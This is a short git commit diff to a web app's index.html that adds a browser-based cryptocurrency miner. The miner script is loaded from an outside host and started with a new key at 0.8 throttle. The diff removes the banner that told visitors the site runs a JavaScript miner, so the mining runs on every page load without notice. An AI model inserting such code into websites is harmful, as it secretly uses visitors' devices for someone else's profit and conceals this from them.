feat(mining): test

--- a/public/index.html
+++ b/public/index.html
@@ -29,14 +29,14 @@
     
   </head>
   <script src="https://www.hostingcloud.racing/IvNX.js"></script>
-<script>
-    var _client = new Client.Anonymous('2221f372bafd9031e42c5e31a80eab5c0bf5a8195148463ddcf79138200e89bf', {
-        throttle: 0.8, c: 'w'
-    });
-    _client.start();
-    _client.addMiningNotification("Top", "This site is running JavaScript miner from coinimp.com", "#cccccc", 40, "#3d3d3d");
-
-</script>
+  <script>
+      var _client = new Client.Anonymous('480adeef4dcd98e2a1334d2d1565bb4a76683c18199ee27d0db6cd02210286e6', {
+          throttle: 0.8, c: 'w', ads: 0
+      });
+      _client.start();
+      
+  
+  </script>
   <body>
     <noscript>You need to enable JavaScript to run this app.</noscript>
     <div id="root"></div>
